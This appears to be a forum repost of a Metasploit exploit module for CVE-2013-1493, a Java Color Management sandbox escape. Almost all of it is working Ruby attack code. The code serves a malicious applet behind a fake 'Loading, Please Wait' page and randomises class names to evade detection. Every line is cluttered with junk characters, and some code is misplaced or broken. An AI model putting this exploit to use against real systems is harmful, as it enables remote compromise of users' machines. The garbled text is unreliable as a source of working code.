##
& X3 N7 U1 p% s( j
( m3 l( A: n0 g" m8 t# This file is part of the Metasploit Framework and may be subject to
; u+ T8 n" c' M5 a" F# redistribution and commercial restrictions. Please see the Metasploit, Y7 n$ m4 E$ R. D J( |2 @% V
# web site for more information on licensing and terms of use.
! }+ B* s9 r3 Z# http://metasploit.com/
! E# A3 X9 D2 _# U( g, b##) f7 x+ o2 ^. U5 W
require ‘msf/core’/ I& T% z2 o3 {
require ‘rex’/ A; x# i( H V% r3 b" e& Y
class Metasploit3 < Msf::Exploit::Remote% i: ~; z# G S+ s( M
Rank = NormalRanking
- |6 P+ d2 \( ~# dinclude Msf::Exploit::Remote::HttpServer::HTML
" T. _/ A1 l& w* ], A! Q9 x1 C7 K2 linclude Msf::Exploit::EXE2 I" ]/ a1 X* z$ I2 @( K- \" S' G5 d
include Msf::Exploit::Remote::BrowserAutopwn
4 x* Q" Q$ _& b/ I5 J. B! `: |autopwn_info({ :javascript => false })
$ M n+ q- x% `7 [def initialize( info = {} )
" ^) Z; O- k. Y( I& ~9 S+ N% Esuper( update_info( info,
9 p# L! b1 Z$ U/ Q& }‘Name’ => ‘Java CMM Remote Code Execution’,
$ Y) X( f2 O( R6 }2 u% i‘Description’ => %q{
4 i5 j7 U2 p* Q' I' @9 c0 z8 OThis module abuses the Color Management classes from a Java Applet to run1 {4 {/ r0 w7 l1 F/ E- \9 y
arbitrary Java code outside of the sandbox as exploited in the wild in February3 K3 J5 p) X8 n7 _
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41# N% g. P* E4 e( i# U
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1, O: Q1 h8 F' [& J: w) r
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java0 Q, O$ x8 m2 ?1 d
warning in order to run the malicious applet.
8 T$ H6 K$ K1 i$ F- ~. x4 `},$ y" l9 C9 b% K0 ^
‘License’ => MSF_LICENSE,& w. I6 r" j1 x0 N$ ~8 q
‘Author’ =>
% ], U" i# @) U/ O; k& L0 N'Unknown', # Vulnerability discovery and Exploit% g3 V% `# f: r, R m
'juan vazquez' # Metasploit module (just ported the published exploit)
8 l5 a+ P; s ]# v2 ^, B],$ q/ I; r7 |% A* b
‘References’ =>
/ a6 {" U/ v: w[
7 h2 l/ t# G1 P z8 F# \4 H, W+ G' _[ 'CVE', '2013-1493' ],
$ u6 _0 r$ z- r1 r( p3 T6 a[ 'OSVDB', '90737' ],
m4 ~% n( V* h+ i) Z[ 'BID', '58238' ],
3 o$ F/ m! n) F7 t[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
+ B- p: x- X% [9 t5 @9 S. X- p0 Q9 ^[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ], d, v: A, N" i& T- n4 y- d! g
[ 'URL', 'http://pastie.org/pastes/6581034' ]
# p5 K8 I$ f, |+ u+ u],
5 Q% M$ u4 t8 u" ~# C/ C, i7 I% \‘Platform’ => [ 'win', 'java' ],
( ~5 c7 Q: a1 K4 ^" Z v‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
# Y! r. |" D1 F% y‘Targets’ =>0 a9 W4 x7 D$ o% \
[, k! u& F1 a" N+ s4 E
[ 'Generic (Java Payload)',6 K- o6 A! A, y' n& C) f j. z
{% y9 p1 z/ \! W5 U& D4 t
'Platform' => 'java',
" I! E, f3 c$ `'Arch' => ARCH_JAVA
0 z5 _7 z+ A& |' q* u}
* {& v& O* s) |, i# i],
) W1 r3 V2 H! Y/ @( z0 m) X/ ~7 T[ 'Windows x86 (Native Payload)',
' `6 D# j% [3 k! {* j1 T3 S{9 J3 Y0 u, z" N6 Y: C
'Platform' => 'win',
! r8 `% ]' P: Q( k3 {'Arch' => ARCH_X86
0 x/ ?+ W# H- q7 M2 ?}9 M( e/ k( e$ ~* g
]' a' n" Y% J [. X% r
],, s9 o9 O' C1 ? a2 j7 T
‘‘DisclosureDate’ => ‘Mar 01 2013′
) H1 S# c9 |- @: O) F2 G))& V$ P/ B$ G' v4 V: N- x9 Y3 }
end$ X8 P' }9 c1 Z4 x9 M
def setup1 P1 x& A0 P8 D/ ~0 r' H) `0 {+ {
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
8 _2 l9 A; t8 B& M) L@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) } t! ^' Y/ d" W
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)7 j. }% E u" |
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }% R$ X* O& q- W# n
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)$ {" u0 w! P" C4 a: u2 V9 x! f
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 Y; a0 O" Y" A3 n, P
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)2 G* L! I- ~* w2 E2 z
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; [2 Q3 T K) Z! I@init_class_name = rand_text_alpha(“Init”.length)1 D* u* F( M, M& w2 @
@init_class.gsub!(“Init”, @init_class_name)) J' a$ Y! m, ~! c: k7 q9 H: U' @& {
super
; m" W$ B; V" uend" w% p0 J( B5 J2 j
def on_request_uri(cli, request)% R9 S1 L* T- z* o0 J- A
print_status(“handling request for #{request.uri}”)9 g+ I0 M& S/ i) b, e" a
case request.uri
/ I5 Q) Y7 ]6 Cwhen /\.jar$/i4 w Z0 [! s7 Q8 I9 B8 y5 X3 z6 N; \
jar = payload.encoded_jar, c# o! A, D( ]4 N( F6 ?
jar.add_file(“#{@init_class_name}.class”, @init_class)* `! l T/ C2 o# X& K, _9 y$ f
jar.add_file(“Leak.class”, @leak_class)
8 ^& q* e E7 R! ~7 fjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
, N1 G% L9 K& i7 Q7 Q& Tjar.add_file(“MyColorSpace.class”, @color_space_class)5 X$ U7 s, z( i8 I3 A
DefaultTarget’ => 1,7 C% p7 c5 [6 K# }& `
metasploit_str = rand_text_alpha(“metasploit”.length)( i; T% O3 [4 h. K
payload_str = rand_text_alpha(“payload”.length)( O* f! V# V0 f6 c
jar.entries.each { |entry|
3 d$ X8 r' z1 Z: N/ C. Z5 o; Eentry.name.gsub!(“metasploit”, metasploit_str): u/ J5 b5 N Y; N# A3 _: Z' D2 \" \# Z
entry.name.gsub!(“Payload”, payload_str)" r. ^4 ~) }& \/ n
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
- [+ @% p' s; M9 nentry.data = entry.data.gsub(“Payload”, payload_str)2 L T: H8 k4 v
}1 J$ A+ ?4 K e
jar.build_manifest
& w! {+ z* |* G1 E }send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
% C+ b- v. _% I kwhen /\/$/1 W/ o# A6 q2 G' s4 g
payload = regenerate_payload(cli)5 I- l% t% U9 ?" K5 P- o
if not payload% v: d+ D% {) I. j, A
print_error(“Failed to generate the payload.”)0 i# S7 i' _3 `* N
send_not_found(cli)
, S1 z: ]* G* p1 h7 }return+ I6 W7 g( f% V" n2 }" Z
end
4 l' s: P% S" p; T7 e+ J( Q) qsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })) D9 ^' u* h( A9 q. n. _5 y
else
8 F, O5 S2 ~/ B& S* L& qsend_redirect(cli, get_resource() + ‘/’, ”)$ j5 O1 }. S+ `
end8 l! ]. @/ ?; s$ J
end; B, m1 v h; X+ t/ r9 e* y% S
def generate_html6 P) M$ }+ M, Q- D
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
y) ~! Z! R+ [$ e3 t# D4 Thtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
3 v* r# B7 N, @$ c+ l; ahtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
* b( ~- X! l+ {0 E- v+ Yhtml += %Q|</applet></body></html>|! e) V9 I v% V* l, T5 l
return html$ j4 A, k4 F/ Y' X
end+ w2 W/ n, d! _( K
end% d5 b, H/ ~# ]6 ~4 J- \$ b
end
1 L) I- U* N: V4 M- p, r% @ |
发表于 2013-4-4 17:31:17
收藏
支持
反对